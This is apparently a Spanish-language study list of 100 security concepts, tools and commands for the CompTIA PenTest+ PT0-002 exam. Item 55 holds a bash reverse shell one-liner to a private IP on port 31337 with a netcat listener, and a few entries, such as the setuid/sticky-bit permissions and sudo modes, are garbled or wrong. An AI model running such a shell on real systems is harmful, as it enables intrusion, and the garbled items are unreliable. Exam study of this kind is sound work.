Repaso del examen Comptia PenTest PT0–002

Para sacar tu certificación de Comptia PT0–002, tienes que pagar $$, y no quieres fallar pues tendrias que volver a pagar. Aquí te dejo estos 100 conceptos de seguridad, que te los tienes que saber antes de cojer el examen.

1. VLAN HOPPING — Switch Spoffing, double tagging
2. Kerberoasting
3. DOS Attack
4. Buffer Overflow
5. Bluejacking
6. SQL Injection
7. Credential Harvesting
8. Tailgating vs Piggybacking
9. aireplay -ng -5 -b
10. FOCA — Metadata within the document
11. RDP Port 3389 — LDAP 389
12. Dumspter diving
13. (SOW) Statement of Work — Timelines , schedule, Price, Excluded Hosts
14. Microsoft Remote Procedure Call(MSRPC) — Enumerate all user accounts
15. Karma attack, Evil Twin Attack
16. De-Escalation
17. Nikto
18. OWASZAP — web app scanner
19. Nessus
20. Systemd — Apple OSX — Persistence Every Reboot
21. OSINT(Open Source Intelligence Tools) — Maltego & Shodan
22. Mimikatz — Credential Testing Tool
23. Steganography — SNOW
24. CVSS base score of 10
25. Hydra — Used to perform credential brute force attack
26. CHCONFIG — Persistence in Linux Service
27. Cookie Enumeration — Set “User” cookie = 138298432 (some random 9 digit value)
28. dsquery -o -rdn -limit 21 — has not authenticated to the domain in 21 days
29. Swagger — API TESTING
30. Sticky bits — CHMOD 4111
31. BPA for Business Partnership Agreement
32. String Slicing
33. Biometric device is tuned more toward false positives
34. (ICS) Industrial Control System
35. Responder — Impersonate Network Resource and collect authentication request.
36. Scope Creep
37. Sanitize all user input & whitelist approach fro SQL statements.
38. Mimikatz — To pull credentials from AD.
39. 135,139,445, Which operating system it is?
40. Empire- Run powershell agents without requiring the use of powershell.exe
41. Cross-site request forgery
42. Cross-site scripting
43. NTFS Alternate Data Streams
44. Which entities would be the proper signing authority penTest, when we are in AWS?
45. %40 is the hex symbol for @
46. Swagger Document — Rest API equivalent of a WSDL
47. Unsecure SUDO vulnerability- /usr/bin/sudo should be 4411 a not 4111
48. Metrics — Are a method of measuring something over time
49. %27 %27 Translate to two single quote marks
50. Wireless Geographic Logging Engine (WiGLE) — wardriving database
51. SCAPY — Packet Crafting Tool
52. IPV6 Broadcast Address FF02::1
53. NAC Bypass
54. Cold Boot Attack — or to a lesser extent, a platform reset attack
55. NC — NLVP 31337 — bash 1>&/dev/tcp/192.168.1.53/31337 0>&1 —
56. Reverse Shell
57. Badge cloning — RFID reader hidden in his coat
58. Web Application Firewall (WAF)
59. echo 127.0.0.1 diontraining.com >> /etc/hosts
60. Karma Attack — variant of the evil twin attack.
61. Nmap -A
62. Nmap -sV
63. Nmap -sT
64. Nmap -Pn
65. Nmap -O
66. Nmap -sU
67. Nmap -sS
68. Nmap -T 1–5
69. Nmap -P
70. Kismet -Wireless Packet Sniffer
71. BASE64 Encoding — Ends with = or == pads
72. SET (Social Engineer Toolkit)
73. BCP (Business Continuity Plan)
74. Sticky MAC — Switch Port MAC Restriction
75. MAC FLOODING — Force UNICAST flooding
76. Writeable Services — Privilege Escalation
77. XCCDF — SCAP Component Extensible Configuration CheckList Description Format
78. Nessus — Popular Vulnerability Scanner
79. SQL INJECTION (Error, Stacked, Union)
80. Burp Suite
81. Reflected XSS
82. DOM Based XSS
83. Parameterized Querys
84. Mitre Att&ck Framework
85. HTTP Payloads
86. IDS — Detect Port Scannning
87. Impacket Python
88. curl -I example.com- I to tell curl to only fetch the HTTP headers (HEAD method)
89. PCI DSS 3.2.1 - Perform internal penetration test at least annually, to comply.
90. PCI DSS - Compliance ChekList
91. PTES technical guidelines
92. Baiting
93. Cybersquatting
94. MITRE ATT&CK framework
95. TTL (Time To Live)
96. Drozer
97. OpenVas
98. DNSSEC
99. Fraggle
100. Smurf